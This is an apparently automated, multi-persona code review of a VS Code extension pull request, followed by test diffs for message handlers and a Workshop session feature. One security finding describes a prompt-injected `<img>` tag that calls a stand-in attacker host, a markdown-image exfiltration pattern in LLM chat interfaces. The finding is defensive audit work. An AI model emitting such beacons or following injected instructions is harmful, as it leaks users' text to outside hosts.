+`packages/core/src/presentation/webview/WorkshopApp.tsx:240` — Assistant turn content (and the live streaming bubble) is untrusted remote text from OpenRouter, and it goes straight through `marked()` into `dangerouslySetInnerHTML` with zero sanitization (`MarkdownRenderer.tsx:36`; grepped the whole repo for `DOMPurify|sanitize-html` — none found). This is NOT new — the sidebar uses the exact same components for the same content today, so this is inherited cross-cutting infrastructure, not a Workshop regression; I'm not blocking PR #67 on it. What genuinely changes here: Sprint 1's panel was a static AI-free shell; this is the sprint where real model output starts rendering in that surface, doubling the blast radius. The CSP's nonce blocks classic script injection, but `img-src` is `${webview.cspSource} https: data:` — any HTTPS host — so a prompt-injected `<img src="https://attacker.example/x?d=...">` in a model response (raw HTML passes through `marked()` untouched) fires a real outbound request from the user's machine: the well-known markdown-image-beacon exfiltration pattern for LLM chat UIs, practical rather than theoretical because it's a network egress point. Recommend sanitizing once at the shared `MarkdownRenderer` (DOMPurify with images/links restricted, or disabling raw-HTML passthrough in `marked`), as a follow-up.
+
+### 🟢 Praise — CSPRNG nonce fix (#15) is correctly and completely done, no drift between surfaces
+
+`apps/vscode-extension/src/application/providers/webviewHtml.ts:105` — Verified this properly closes the PR #66 finding. `getNonce()`/`getWebviewHtml()` is the ONE shared implementation for both webviews (both providers route through it; grepped `apps/` for `Math.random`/stray nonce generators — none, no half-migrated surface). `randomBytes(24)` = 192 bits of CSPRNG, base64 to a clean 32-char token (no padding, 24 divisible by 3), valid CSP nonce charset. One fresh value per `getWebviewHtml()` call, reused across that load's CSP meta + three script tags — correct semantics. `script-src` still carries no `unsafe-inline`; `localResourceRoots` still scoped to the extension URI. Nothing widened alongside the nonce change.
+
+> *"The nonce is finally unguessable — now the model's own `<img>` tags are the ones you have to worry about guessing where to send your excerpt."* — Patricia
+
+---
+
+## 🌙 Oliver · Observability & Debuggability
+
+"Would This Failure Leave a Trail at 2am?"
+
+### 🟠 High — Preempted/reset/zombie Workshop runs leave no request- or tool-correlated log — the only trail anywhere is one anonymous, shared orchestrator line
+
+`packages/core/src/application/handlers/domain/WorkshopHandler.ts:142` — Searched diff for log calls in the three silent-drop paths — not found. WorkshopHandler logs exactly three things: excerpt-pin, "Session reset", and `sendError`. Nothing logs `preemptActiveRun()` (fired on second-run preemption AND reset-mid-run) or the `if (cancelled)` branch that actually runs when an aborted run resolves. `WorkshopSessionService.completeToolRun` returns `undefined` for a stale requestId — its own doc comment concedes the aggregate "silently refuses" — and the caller just skips `postTurn`, no else-branch log. Traced deeper: `AIResourceOrchestrator.executeWithoutCapabilities` catches the AbortError itself and *resolves normally* with `cancelled=true` — so WorkshopHandler's own AbortError catch branch (line 171) is effectively dead code for this path, and the orchestrator's `"Streaming cancelled (N chars)"` lines are the ONLY trail for an aborted Workshop run anywhere in the system. Those lines carry no domain, tool, or request id — even though the enclosing method has a `toolName` parameter it logs at request start and never repeats on the cancel lines. This PR is exactly what makes that ambiguity land: sidebar and Workshop now stream concurrently through the same manager. A dev looking at the output channel after "my Workshop result never showed up" gets a character count and nothing else. The abort/zombie tests assert session state; none assert anything about what gets logged.
+
+### 🟢 Praise — Token-usage/status listener fan-out isolates and logs a throwing listener instead of silently killing the broadcast for every other webview
+
+`packages/core/src/infrastructure/api/orchestration/AIResourceManager.ts:62` — This is exactly the failure mode that would have been undiagnosable: two surfaces share one manager/services, each fanning callbacks out to a Set of per-webview listeners. Without the per-listener guard, one listener's exception would abort the loop mid-iteration and silently starve every listener registered after it — one webview's bug blinding the other surface with zero explanation. Instead each call is individually try/caught and logged with a service-tagged line, in all four fan-out sites. A throwing listener is contained and diagnosable; the rest keep running. Good defensive logging exactly where the multi-webview change made it newly necessary.
+
+> *"The result disappears, the log just shrugs 'streaming cancelled, N chars' — no name, no number, no idea whose. That's not a trail, that's a shrug."* — Oliver
+
+---
+
+## 🎯 Bria · Domain Logic & Business Correctness
+
+"Does This Code Actually Do What the Ticket Asked?"
+
+### 🟠 High — useWorkshop.ts is the one domain hook with zero tests — and it's the one holding the reload-safety reconciliation [🎯 Consensus]
+
+`packages/core/src/presentation/webview/hooks/domain/useWorkshop.ts:234` — Every sibling hook in `hooks/domain/` — 10 for 10 — has a matching `*.test.ts` under `__tests__/…/hooks/domain/`. `useWorkshop.ts` doesn't (searched diff for `useWorkshop.test` and `describe('useWorkshop` — not found; repo-wide, only the hook itself exists). This isn't a trivial hook: it owns the webview-side half of the sprint's headline acceptance criterion (reload-safety) — re-adopting a mid-run request from a snapshot, retiring the live bubble without double-rendering. The sprint doc itemizes its test count with real precision — "8 tests; plus 12 WorkshopHandler tests and a MessageHandler-level reload-safety test" — and that tally stops exactly at the host boundary. Unlike the F5-smoke gap and the fake-panel-fixture gap (both explicitly logged with a stated reason for deferring), this gap is never mentioned — it's just absent, on the one hook where the convention was previously 100% consistent.
+
+### 🟡 Standard — Architecture witness never learned Workshop exists — "news nothing" isn't enforced for WorkshopSessionService
+
+`packages/core/src/__tests__/architecture/boundaries.test.ts:57` — Sprint acceptance criterion: "architecture tests confirm the handler is composed from injected services and `new`-s nothing." WorkshopHandler itself is clean — the session arrives via constructor injection. But the only generic witness for this checks a hardcoded five-class regex (`FORBIDDEN_INFRASTRUCTURE_CONSTRUCTION`) that was never extended to include `WorkshopSessionService` (searched diff for "boundaries.test" — not touched by this PR). The new `providerAssembly.test.ts` witness only covers providers constructing `MessageHandler`. So the acceptance claim is true by observation today, not by enforcement: a future `new WorkshopSessionService()` inside any handler would compile, lint, and pass every existing test — while silently forking the reload-safety aggregate this entire sprint is named after.
+
+> *"The sprint doc counts its tests down to the exact number — 8, plus 12, plus 1 — and the tally stops right at the host boundary, one hook short of where reload-safety actually gets rendered to the screen. Probably fine. Probably."* — Bria
+
+---
+
+## 🎓 Sensei · The Teacher
+
+"The Review Is the Lesson. The Code Is the Practice."
+
+### Lesson 1 — The Clamp Outlasts the Grip
+
+Illuminated by: Cal #1, Cal #2, Bria #2 — with Marcus's praise (the compiler-enforced `Exclude` type) as proof the clamp was already in your toolbox
+
+Every claim a PR makes — "dispose can no longer blind the survivor," "COMPLETE precedes the turn," "the handler news nothing" — is held either by an artifact that turns red when it stops being true, or by the pressure of your attention on the day you verified it. Attention is real pressure, like hand-holding a glued joint, but you eventually let go; the deferred-scope type in this very PR shows the alternative — a claim the compiler will defend long after everyone forgets why. Notice where the panel's findings pooled: precisely where something was true by observation rather than by enforcement. The verification was excellent — and it was mortal.
+
+→ Carry forward: After writing the PR description, read each claim and ask: "What, specifically, fails if this sentence stops being true?" If the answer is "a future reader's memory," you are still holding the joint by hand.
+
+### Lesson 2 — Debts Are Inherited; Defenses Are Enrolled
+
+Illuminated by: Cal #3 + Bria #1, Stan #1, Stan #2, Patricia #1, Sam #2 (the pre-existing twin)
+
+When a twelfth sibling joins a family of eleven, its exposures arrive automatically — the shared markdown pipeline's open window, the elder handler's ungated status shape, a doubled blast radius — while every protection waits for a signature: the witness regex, the per-hook test, the house idiom, the error-logging path. This asymmetry is structural, not a lapse of care: copying propagates risk for free and safety only by ceremony, so gaps will always gather on the newest member unless enrollment is made a deliberate act. Your most mature sibling is your best reviewer — each difference between it and the newcomer is either a decision worth recording or an enrollment still pending.
+
+→ Carry forward: When adding instance N of an established pattern, diff it against sibling N−1 twice — once asking "which protections does it carry that mine lacks?" and once asking "which liabilities do we now share, and did my arrival just make this the cheapest moment to retire one at the source?"
+
+### Lesson 3 — Concurrency Retires the Definite Article
+
+Illuminated by: Oliver, Sam #1, Sam #2, Parker #2 — with Blake's clean pass as the control group
+
+The deepest change in this sprint is grammatical: once two runs, two surfaces, two webviews can be in flight, every "the" in the system — *the* status, *the* excerpt, *the* cancelled-stream log line — quietly encodes an assumption of one. The evidence runs both directions: wherever identity rode along (the requestId guards), every race Blake threw bounced off; wherever it did not (status payloads, cancellation traces, a turn that cannot say which excerpt it analyzed), the findings pooled. And when a sprint's headline behaviors are subtractive — preempt, abort, refuse the zombie — each designed disappearance must leave a named trace, or correct behavior becomes indistinguishable from malfunction. Identity belongs on the data and the evidence, not only on the control flow; three parallel trackers for one identity is that identity telling you it has no proper home.
+
+→ Carry forward: After any change that makes two-in-flight possible, ride one real preemption end-to-end through the output channel and ask: could a stranger at 2 a.m. reconstruct what happened to the first run — and does the signal even arrive at the layer where I wrote the handler for it?
+
+### Lesson 4 — Knowledge Wants One Address
+
+Illuminated by: Marcus #1 + Parker #1
+
+The listener-set primitive — Set, unsubscribe closure, per-listener try/catch so one subscriber cannot blind another — is not four snippets of text; it is one piece of knowledge, a dispatch contract, written out longhand four times beside a fifth copy the codebase had already composed. The entire reason the fix exists is that this contract is subtle enough to get wrong, and scattering it to five addresses means the next refinement must be found five times while each address drifts on its own. The moment of transcription is the cheapest extraction moment there will ever be, because it is the only time the full contract lives whole in your working memory — the same reason a fix's regression test is cheapest at fix-time.
+
+→ Carry forward: When your fingers are typing a mechanism they have typed before — above all while fixing it — stop and search for the sentence you are about to write; the codebase may have already said it once, and that prior art is the pattern asking for its name.
+
+### Lesson 5 — Boundaries Are Load-Bearing Twice
+
+Illuminated by: Parker #3 + Tim #2, Tim #1, Tim #3
+
+In a declarative UI, the seams you cut for human comprehension are the same seams the runtime uses to skip work: a five-hundred-line component is not merely long, it is a single re-render region, so every streamed token re-splits the excerpt and re-walks the turn list because nothing tells the machine where the still parts live. The same holds one layer down, where a snapshot that re-clones the entire history on every mutation is a broadcast with no boundary around "what changed." Extraction here is not tidying — it is handing the system the information it needs in order to be lazy. Like an interior wall on a blueprint: drawn to organize rooms for the people, yet it also carries the joists.
+
+→ Carry forward: When a component or aggregate grows past a screen, ask not "is this untidy?" but "what work is the machine forced to repeat because I have not told it where the sameness lives?"
+
+> *"Skill is the strength of your grip while the glue sets; craft is whatever still holds the joint after you have let go."* — Sensei
+
+---
+
+## The Closer
+
+### 🎋 Haiku
+
+> Two windows, one spine —
+> spring wind preempts the old stream;
+> the monk logs nothing.
+
+---
+
+## Summary
+
+This is a strong sprint: Blake — the panel's blocking-issues specialist — traced every preemption, reset, zombie, dispose, and reload race against real source and found nothing that clears the merge-blocking bar; the requestId-keyed spine holds at both layers, and four separate reviewers left praise for deliberate craft (the compile-time cancel gate, the zero-drift lifecycle mirror, the complete nonce fix, the fault-isolated fan-out). The four High findings all live at the seams of verification rather than in the runtime: the load-bearing multicast fix ships without a test of its own scenario, the webview half of reload-safety is the one untested hook in the codebase, designed disappearances (preempt/reset/zombie) leave no correlated log trail, and a mid-run excerpt re-pin can silently misattribute a finished turn. **Verdict: nearly there** — mergeable on correctness, but items 1–4 (plus the small Opens in the ledger) are exactly the kind of cheap-now, expensive-later work worth landing on this branch before Sprint 3 builds multi-turn on top of these seams.
+
+---
+
+*Reviewed by: Marcus 🏛️ · Blake 🔥 · Sam 🔍 · Parker 📖 · Cal 🧪 · Stan 🗂️ · Tim ⚡ · Patricia 🛡️ · Oliver 🌙 · Bria 🎯 · Sensei 🎓*

--- a/packages/core/src/__tests__/application/handlers/MessageHandler.test.ts
+++ b/packages/core/src/__tests__/application/handlers/MessageHandler.test.ts
@@ -1,5 +1,6 @@
 import { MessageHandler } from '@/application/handlers/MessageHandler';
 import { CoreServices } from '@/application/handlers/MessageHandlerContracts';
+import { WorkshopSessionService } from '@/application/services/WorkshopSessionService';
 import {
   ExtensionToWebviewMessage,
   MessageType,
@@ -34,7 +35,10 @@ interface TestAssembly {
   disposeSecretListener: jest.Mock;
   secretOnDidChange: jest.Mock;
   accountDispose: jest.Mock;
-  categorySetStatusEmitter: jest.Mock;
+  categoryAddStatusListener: jest.Mock;
+  disposeCategoryStatusListener: jest.Mock;
+  disposeDictionaryStatusListener: jest.Mock;
+  disposeTokenUsageListener: jest.Mock;
   tokenUsageCallback: () => TokenUsageCallback | undefined;
 }
 
@@ -72,15 +76,21 @@ function createTestAssembly(): TestAssembly {
   const disposeSecretListener = jest.fn();
   const secretOnDidChange = jest.fn(() => ({ dispose: disposeSecretListener }));
   const accountDispose = jest.fn();
-  const categorySetStatusEmitter = jest.fn();
+  const categoryAddStatusListener = jest.fn(() => disposeCategoryStatusListener);
+  const disposeCategoryStatusListener = jest.fn();
+  const disposeDictionaryStatusListener = jest.fn();
+  const disposeTokenUsageListener = jest.fn(() => {
+    capturedTokenUsageCallback = undefined;
+  });
 
   const services = {
     assistantToolService: {
-      setStatusEmitter: jest.fn(),
+      // Registered twice per handler: AnalysisHandler + WorkshopHandler.
+      addStatusListener: jest.fn(() => jest.fn()),
       refreshConfiguration: jest.fn().mockResolvedValue(undefined)
     },
     dictionaryService: {
-      setStatusEmitter: jest.fn(),
+      addStatusListener: jest.fn(() => disposeDictionaryStatusListener),
       refreshConfiguration: jest.fn().mockResolvedValue(undefined)
     },
     contextAssistantService: {
@@ -94,9 +104,9 @@ function createTestAssembly(): TestAssembly {
       getGenres: jest.fn().mockResolvedValue([])
     },
     aiResourceManager: {
-      setStatusCallback: jest.fn(),
-      setTokenUsageCallback: jest.fn((callback?: TokenUsageCallback) => {
+      addTokenUsageListener: jest.fn((callback: TokenUsageCallback) => {
         capturedTokenUsageCallback = callback;
+        return disposeTokenUsageListener;
       }),
       refreshConfiguration: jest.fn().mockResolvedValue(undefined)
     },
@@ -108,14 +118,17 @@ function createTestAssembly(): TestAssembly {
     },
     textSourceResolver: {},
     categorySearchService: {
-      setStatusEmitter: categorySetStatusEmitter
+      addStatusListener: categoryAddStatusListener
     },
     accountBalanceService: {
       getBalances,
       scheduleRefresh,
       addRefreshListener: accountAddRefreshListener,
       dispose: accountDispose
-    }
+    },
+    // Real aggregate on purpose: it is pure/dependency-free, and using it makes
+    // the reload-safety test below exercise true session behavior.
+    workshopSessionService: new WorkshopSessionService()
   } as unknown as CoreServices;
 
   return {
@@ -129,7 +142,10 @@ function createTestAssembly(): TestAssembly {
     accountDispose,
     disposeSecretListener,
     secretOnDidChange,
-    categorySetStatusEmitter,
+    categoryAddStatusListener,
+    disposeCategoryStatusListener,
+    disposeDictionaryStatusListener,
+    disposeTokenUsageListener,
     tokenUsageCallback: () => capturedTokenUsageCallback
   };
 }
@@ -167,7 +183,57 @@ describe('MessageHandler assembly', () => {
         source: 'extension.account'
       })
     );
-    expect(assembly.categorySetStatusEmitter).toHaveBeenCalledWith(expect.any(Function));
+    expect(assembly.categoryAddStatusListener).toHaveBeenCalledWith(expect.any(Function));
+  });
+
+  it('routes workshop messages (12th domain) and rehydrates a new handler from the shared session aggregate', async () => {
+    const assembly = createTestAssembly();
+    const postMessage = jest.fn().mockResolvedValue(undefined);
+    const handler = createHandler(assembly, postMessage);
+    postMessage.mockClear();
+
+    await handler.handleMessage({
+      type: MessageType.WORKSHOP_SET_EXCERPT,
+      source: 'webview.workshop',
+      payload: { text: 'A line of prose worth keeping.' },
+      timestamp: Date.now()
+    });
+
+    expect(postMessage).toHaveBeenCalledWith(
+      expect.objectContaining({
+        type: MessageType.WORKSHOP_SESSION_STATE,
+        source: 'extension.workshop',
+        payload: expect.objectContaining({
+          session: expect.objectContaining({
+            excerpt: expect.objectContaining({ text: 'A line of prose worth keeping.' })
+          })
+        })
+      })
+    );
+
+    // Panel closed and reopened: a SECOND handler over the SAME bundle serves
+    // the same session back — the ADR's reload-safety criterion.
+    const secondPost = jest.fn().mockResolvedValue(undefined);
+    const second = createHandler(assembly, secondPost);
+    secondPost.mockClear();
+
+    await second.handleMessage({
+      type: MessageType.WORKSHOP_REQUEST_SESSION,
+      source: 'webview.workshop',
+      payload: {},
+      timestamp: Date.now()
+    });
+
+    expect(secondPost).toHaveBeenCalledWith(
+      expect.objectContaining({
+        type: MessageType.WORKSHOP_SESSION_STATE,
+        payload: expect.objectContaining({
+          session: expect.objectContaining({
+            excerpt: expect.objectContaining({ text: 'A line of prose worth keeping.' })
+          })
+        })
+      })
+    );
   });
 
   it('does not arm a balance refresh for activation/reset token updates', () => {
@@ -226,11 +292,16 @@ describe('MessageHandler assembly', () => {
 
     first.dispose();
 
+    // Dispose releases ONLY this instance's registrations…
     expect(assembly.disposeBalanceListener).toHaveBeenCalledTimes(1);
     expect(assembly.disposeSecretListener).toHaveBeenCalledTimes(1);
-    expect(assembly.accountDispose).toHaveBeenCalledTimes(1);
-    expect(assembly.categorySetStatusEmitter).toHaveBeenLastCalledWith(undefined);
+    expect(assembly.disposeTokenUsageListener).toHaveBeenCalledTimes(1);
+    expect(assembly.disposeDictionaryStatusListener).toHaveBeenCalledTimes(1);
+    expect(assembly.disposeCategoryStatusListener).toHaveBeenCalledTimes(1);
     expect(assembly.tokenUsageCallback()).toBeUndefined();
+    // …and NEVER tears down the shared service: the other webview surface
+    // (sidebar ↔ Workshop panel) still depends on it (PR #66 review, Tim).
+    expect(assembly.accountDispose).not.toHaveBeenCalled();
 
     createHandler(
       assembly,
@@ -239,7 +310,7 @@ describe('MessageHandler assembly', () => {
 
     expect(assembly.accountAddRefreshListener).toHaveBeenCalledTimes(2);
     expect(assembly.secretOnDidChange).toHaveBeenCalledTimes(2);
-    expect(assembly.categorySetStatusEmitter).toHaveBeenLastCalledWith(expect.any(Function));
+    expect(assembly.categoryAddStatusListener).toHaveBeenCalledTimes(2);
     expect(assembly.tokenUsageCallback()).toEqual(expect.any(Function));
   });
 

--- a/packages/core/src/__tests__/application/handlers/MessageHandler.test.ts
+++ b/packages/core/src/__tests__/application/handlers/MessageHandler.test.ts
@@ -38,12 +38,17 @@ interface TestAssembly {
   categoryAddStatusListener: jest.Mock;
   disposeCategoryStatusListener: jest.Mock;
   disposeDictionaryStatusListener: jest.Mock;
-  disposeTokenUsageListener: jest.Mock;
-  tokenUsageCallback: () => TokenUsageCallback | undefined;
+  /** Fan a token-usage event out to every LIVE registration (real Set). */
+  emitTokenUsage: (usage: TokenUsageTotals) => void;
+  tokenUsageListenerCount: () => number;
 }
 
 function createTestAssembly(): TestAssembly {
-  let capturedTokenUsageCallback: TokenUsageCallback | undefined;
+  // A REAL listener set (not a single captured slot): the fakes must be able
+  // to distinguish handler A's registration from handler B's, or the
+  // dispose-blinds-the-survivor regression is structurally untestable
+  // (PR #67 review #2, Cal).
+  const tokenUsageListeners = new Set<TokenUsageCallback>();
 
   const log: LogSink = {
     appendLine: jest.fn(),
@@ -79,9 +84,6 @@ function createTestAssembly(): TestAssembly {
   const categoryAddStatusListener = jest.fn(() => disposeCategoryStatusListener);
   const disposeCategoryStatusListener = jest.fn();
   const disposeDictionaryStatusListener = jest.fn();
-  const disposeTokenUsageListener = jest.fn(() => {
-    capturedTokenUsageCallback = undefined;
-  });
 
   const services = {
     assistantToolService: {
@@ -105,8 +107,10 @@ function createTestAssembly(): TestAssembly {
     },
     aiResourceManager: {
       addTokenUsageListener: jest.fn((callback: TokenUsageCallback) => {
-        capturedTokenUsageCallback = callback;
-        return disposeTokenUsageListener;
+        tokenUsageListeners.add(callback);
+        return () => {
+          tokenUsageListeners.delete(callback);
+        };
       }),
       refreshConfiguration: jest.fn().mockResolvedValue(undefined)
     },
@@ -145,8 +149,12 @@ function createTestAssembly(): TestAssembly {
     categoryAddStatusListener,
     disposeCategoryStatusListener,
     disposeDictionaryStatusListener,
-    disposeTokenUsageListener,
-    tokenUsageCallback: () => capturedTokenUsageCallback
+    emitTokenUsage: (usage) => {
+      for (const listener of [...tokenUsageListeners]) {
+        listener(usage);
+      }
+    },
+    tokenUsageListenerCount: () => tokenUsageListeners.size
   };
 }
 
@@ -243,7 +251,7 @@ describe('MessageHandler assembly', () => {
 
     expect(assembly.scheduleRefresh).not.toHaveBeenCalled();
 
-    assembly.tokenUsageCallback()?.({
+    assembly.emitTokenUsage({
       promptTokens: 0,
       completionTokens: 0,
       totalTokens: 0,
@@ -251,13 +259,44 @@ describe('MessageHandler assembly', () => {
     });
     expect(assembly.scheduleRefresh).not.toHaveBeenCalled();
 
-    assembly.tokenUsageCallback()?.({
+    assembly.emitTokenUsage({
       promptTokens: 3,
       completionTokens: 2,
       totalTokens: 5,
       costUsd: 0.001
     });
     expect(assembly.scheduleRefresh).toHaveBeenCalledTimes(1);
+  });
+
+  it('token usage fans out to BOTH live surfaces, and disposing one never blinds the survivor', () => {
+    const assembly = createTestAssembly();
+    const sidebarPost = jest.fn().mockResolvedValue(undefined);
+    const workshopPost = jest.fn().mockResolvedValue(undefined);
+    createHandler(assembly, sidebarPost); // the sidebar's handler
+    const workshop = createHandler(assembly, workshopPost); // the panel's handler
+    sidebarPost.mockClear();
+    workshopPost.mockClear();
+
+    const tokenUpdates = (post: jest.Mock) =>
+      post.mock.calls.map((c) => c[0]).filter((m) => m.type === MessageType.TOKEN_USAGE_UPDATE);
+
+    // One real request's usage reaches BOTH webviews — the load-bearing
+    // multicast behavior itself (PR #67 review #2).
+    assembly.emitTokenUsage({ promptTokens: 3, completionTokens: 2, totalTokens: 5, costUsd: 0.001 });
+    expect(tokenUpdates(sidebarPost)).toHaveLength(1);
+    expect(tokenUpdates(workshopPost)).toHaveLength(1);
+    expect(assembly.tokenUsageListenerCount()).toBe(2);
+
+    // Closing the Workshop panel releases ONLY its registration…
+    workshop.dispose();
+    expect(assembly.tokenUsageListenerCount()).toBe(1);
+    sidebarPost.mockClear();
+    workshopPost.mockClear();
+
+    // …so the sidebar keeps receiving after the panel is gone.
+    assembly.emitTokenUsage({ promptTokens: 1, completionTokens: 1, totalTokens: 2, costUsd: 0.0002 });
+    expect(tokenUpdates(workshopPost)).toHaveLength(0);
+    expect(tokenUpdates(sidebarPost)).toHaveLength(1);
   });
 
   it('keeps replay caches isolated between handler instances', async () => {
@@ -295,10 +334,9 @@ describe('MessageHandler assembly', () => {
     // Dispose releases ONLY this instance's registrations…
     expect(assembly.disposeBalanceListener).toHaveBeenCalledTimes(1);
     expect(assembly.disposeSecretListener).toHaveBeenCalledTimes(1);
-    expect(assembly.disposeTokenUsageListener).toHaveBeenCalledTimes(1);
     expect(assembly.disposeDictionaryStatusListener).toHaveBeenCalledTimes(1);
     expect(assembly.disposeCategoryStatusListener).toHaveBeenCalledTimes(1);
-    expect(assembly.tokenUsageCallback()).toBeUndefined();
+    expect(assembly.tokenUsageListenerCount()).toBe(0);
     // …and NEVER tears down the shared service: the other webview surface
     // (sidebar ↔ Workshop panel) still depends on it (PR #66 review, Tim).
     expect(assembly.accountDispose).not.toHaveBeenCalled();
@@ -311,7 +349,7 @@ describe('MessageHandler assembly', () => {
     expect(assembly.accountAddRefreshListener).toHaveBeenCalledTimes(2);
     expect(assembly.secretOnDidChange).toHaveBeenCalledTimes(2);
     expect(assembly.categoryAddStatusListener).toHaveBeenCalledTimes(2);
-    expect(assembly.tokenUsageCallback()).toEqual(expect.any(Function));
+    expect(assembly.tokenUsageListenerCount()).toBe(1);
   });
 
   it('refreshes AI services when the stored API key changes (self-heal)', async () => {

--- a/packages/core/src/__tests__/application/handlers/domain/AnalysisHandler.test.ts
+++ b/packages/core/src/__tests__/application/handlers/domain/AnalysisHandler.test.ts
@@ -38,7 +38,7 @@ describe('AnalysisHandler', () => {
         result: 'Test prose result',
         tokenUsage: { promptTokens: 100, completionTokens: 50, totalTokens: 150 }
       }),
-      setStatusEmitter: jest.fn()
+      addStatusListener: jest.fn(() => jest.fn())
     } as any;
 
     mockPostMessage = jest.fn().mockResolvedValue(undefined);

--- a/packages/core/src/__tests__/application/handlers/domain/AnalysisHandler.test.ts
+++ b/packages/core/src/__tests__/application/handlers/domain/AnalysisHandler.test.ts
@@ -128,6 +128,52 @@ describe('AnalysisHandler', () => {
     });
   });
 
+  describe('Shared-service status gating (PR #67 review)', () => {
+    it('forwards guide-loading status only while a request is in flight', async () => {
+      // Capture the listener registered on the SHARED AssistantToolService —
+      // with two webviews live, un-gated forwarding would strand the other
+      // surface's "Loading craft guides…" here with nothing to clear it.
+      let captured: ((m: string, p?: { current: number; total: number }, t?: string) => void) | undefined;
+      (mockService.addStatusListener as jest.Mock).mockImplementation((listener) => {
+        captured = listener;
+        return jest.fn();
+      });
+      const gatedHandler = new AnalysisHandler(mockService, mockPostMessage, createFakeSettings());
+      expect(captured).toBeDefined();
+
+      // Idle: another surface's run is loading guides — stay silent.
+      captured!('Loading requested craft guides...', undefined, 'guide.md');
+      expect(mockPostMessage).not.toHaveBeenCalled();
+
+      // In flight: activeRequests is populated synchronously at run start,
+      // before the handler's internal awaits — fire the shared-service event
+      // in that window, then let the run settle.
+      const runPromise = gatedHandler.handleAnalyzeProse(
+        createTestMessage(MessageType.ANALYZE_PROSE, { text: 'Some prose' }) as never
+      );
+
+      captured!('Loading requested craft guides...', undefined, 'guide.md');
+      const guideStatuses = mockPostMessage.mock.calls
+        .map((call) => call[0])
+        .filter(
+          (m) => m?.type === MessageType.STATUS && m.payload.message === 'Loading requested craft guides...'
+        );
+      expect(guideStatuses).toHaveLength(1);
+
+      await runPromise;
+    });
+
+    it('dispose releases the status subscription', () => {
+      const disposeListener = jest.fn();
+      (mockService.addStatusListener as jest.Mock).mockReturnValue(disposeListener);
+      const localHandler = new AnalysisHandler(mockService, mockPostMessage, createFakeSettings());
+
+      localHandler.dispose();
+
+      expect(disposeListener).toHaveBeenCalledTimes(1);
+    });
+  });
+
   describe('Error Handling', () => {
     it('should handle service errors gracefully', async () => {
       mockService.analyzeDialogue.mockRejectedValue(new Error('Service failure'));

--- a/packages/core/src/__tests__/application/handlers/domain/WorkshopHandler.test.ts
+++ b/packages/core/src/__tests__/application/handlers/domain/WorkshopHandler.test.ts
@@ -1,0 +1,300 @@
+/**
+ * WorkshopHandler Tests (ADR 2026-07-03, Sprint 2 — session spine).
+ *
+ * Behavior under test: route registration for the 12th domain; a tool run
+ * streams under domain 'workshop' and appends a user+assistant turn pair to
+ * the shared session; excerpt/reset/session-request mutate and serve the
+ * aggregate; guard rails (no excerpt, unknown tool, missing API key) surface
+ * errors without corrupting the thread. Uses the REAL WorkshopSessionService —
+ * it is pure, and the handler↔aggregate contract is exactly what this sprint
+ * introduces.
+ */
+
+import { WorkshopHandler } from '@/application/handlers/domain/WorkshopHandler';
+import { WorkshopSessionService } from '@/application/services/WorkshopSessionService';
+import { MessageRouter } from '@/application/handlers/MessageRouter';
+import { MessageType, API_KEY_NOT_CONFIGURED_HEADING } from '@messages';
+import type { AssistantToolService } from '@services/analysis/AssistantToolService';
+import type { LogSink } from '@/platform';
+
+const analysisResult = (content: string, extra: Record<string, unknown> = {}) => ({
+  toolName: 'test_tool',
+  content,
+  usage: { promptTokens: 10, completionTokens: 20, totalTokens: 30 },
+  ...extra
+});
+
+const message = (type: MessageType, payload: unknown) => ({
+  type,
+  source: 'webview.workshop' as const,
+  payload,
+  timestamp: Date.now()
+});
+
+describe('WorkshopHandler', () => {
+  let session: WorkshopSessionService;
+  let postMessage: jest.Mock;
+  let log: LogSink;
+  let mockService: jest.Mocked<AssistantToolService>;
+  let handler: WorkshopHandler;
+
+  const postedTypes = () => postMessage.mock.calls.map((c) => c[0].type);
+  const postedOf = (type: MessageType) =>
+    postMessage.mock.calls.map((c) => c[0]).filter((m) => m.type === type);
+
+  beforeEach(() => {
+    session = new WorkshopSessionService();
+    postMessage = jest.fn().mockResolvedValue(undefined);
+    log = { appendLine: jest.fn() } as unknown as LogSink;
+    mockService = {
+      analyzeDialogue: jest.fn().mockResolvedValue(analysisResult('dialogue analysis')),
+      analyzeProse: jest.fn().mockResolvedValue(analysisResult('prose analysis')),
+      analyzeWritingTools: jest.fn().mockResolvedValue(analysisResult('tools analysis')),
+      addStatusListener: jest.fn(() => jest.fn())
+    } as unknown as jest.Mocked<AssistantToolService>;
+
+    handler = new WorkshopHandler(mockService, session, postMessage, log);
+  });
+
+  it('registers the four workshop routes', () => {
+    const router = new MessageRouter();
+    handler.registerRoutes(router);
+
+    expect(router.hasHandler(MessageType.WORKSHOP_RUN_TOOL)).toBe(true);
+    expect(router.hasHandler(MessageType.WORKSHOP_SET_EXCERPT)).toBe(true);
+    expect(router.hasHandler(MessageType.WORKSHOP_RESET_SESSION)).toBe(true);
+    expect(router.hasHandler(MessageType.WORKSHOP_REQUEST_SESSION)).toBe(true);
+    expect(router.handlerCount).toBe(4);
+  });
+
+  it('pins an excerpt and broadcasts the session snapshot', async () => {
+    await handler.handleSetExcerpt(
+      message(MessageType.WORKSHOP_SET_EXCERPT, {
+        text: 'She left the letter on the table.',
+        relativePath: 'ch1.md'
+      }) as any
+    );
+
+    const [state] = postedOf(MessageType.WORKSHOP_SESSION_STATE);
+    expect(state.payload.session.excerpt.text).toBe('She left the letter on the table.');
+    expect(session.getExcerpt()?.relativePath).toBe('ch1.md');
+  });
+
+  it('rejects an empty excerpt with a workshop error', async () => {
+    await handler.handleSetExcerpt(
+      message(MessageType.WORKSHOP_SET_EXCERPT, { text: '   ' }) as any
+    );
+
+    const [error] = postedOf(MessageType.ERROR);
+    expect(error.payload.source).toBe('workshop');
+    expect(postedOf(MessageType.WORKSHOP_SESSION_STATE)).toHaveLength(0);
+  });
+
+  it('refuses to run a tool without a pinned excerpt', async () => {
+    await handler.handleRunTool(
+      message(MessageType.WORKSHOP_RUN_TOOL, { toolId: 'prose' }) as any
+    );
+
+    const [error] = postedOf(MessageType.ERROR);
+    expect(error.payload.source).toBe('workshop.run_tool');
+    expect(error.payload.message).toMatch(/excerpt/i);
+    expect(mockService.analyzeProse).not.toHaveBeenCalled();
+    expect(session.getSnapshot().turns).toHaveLength(0);
+  });
+
+  it('rejects an unknown tool id before touching the session', async () => {
+    session.setExcerpt({ text: 'Some prose.' });
+
+    await handler.handleRunTool(
+      message(MessageType.WORKSHOP_RUN_TOOL, { toolId: 'summon-dragons' }) as any
+    );
+
+    const [error] = postedOf(MessageType.ERROR);
+    expect(error.payload.message).toMatch(/Unknown Workshop tool/);
+    expect(session.getSnapshot().turns).toHaveLength(0);
+  });
+
+  it('runs a tool: streams under domain workshop and appends the turn pair', async () => {
